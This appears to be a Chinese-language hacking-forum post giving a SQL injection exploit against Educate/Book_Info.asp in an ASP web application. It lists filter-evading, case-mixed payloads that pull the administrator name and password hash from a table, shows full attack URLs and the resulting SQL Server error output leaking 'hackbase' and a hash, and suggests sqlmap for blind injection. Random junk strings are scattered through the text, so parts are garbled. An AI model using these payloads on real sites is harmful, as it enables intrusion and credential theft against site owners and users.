漏洞出现在Educate/Book_Info.asp
( h. e5 P! c! {* ^
\9 Y. i8 o- f" D8 F此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出. W7 @" C# f( H9 ~, W" v6 O5 ~+ R
7 t# z; m; j- _
exp:如下
. V5 X. e0 Y' _查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)' u$ l! ]* R! Q5 J# ~
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)# B1 c9 ] G2 Q6 P! M
) P& D$ S e2 V9 m* r6 rhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)% X5 c/ ~/ f7 h" k- Z9 L% x; o
) d% O( u, c! e3 M2 F- t+ |9 U1 vMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
! i- G" ]2 Z0 ^1 I E& A& K : |1 L" H& u! [2 u# E- p! G2 ] t8 w1 p
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
. k* n `- w% j8 {. d
7 Q- ^# o& S$ k/Educate/Book_Info.asp,行 8
2 T1 S$ \) t! e8 [! ^
/ z6 z5 q1 a9 i& a, C8 l/ P: dhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
9 L4 H8 l, J: c' h5 r8 D; `
' n3 x8 P: R# t8 p1 nMicrosoft OLE DB Provider for SQL Server 错误 '80040e07': E: h; D7 {/ |2 i N9 c- q
8 h. Z* _. R( p; \" G1 E" ^将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。& M: ~. t1 k( M! z( ?; G* `/ w
4 h! M; w6 j3 T9 O% V8 t% w8 l3 y/Educate/Book_Info.asp,行 83 p F, e; m9 f
|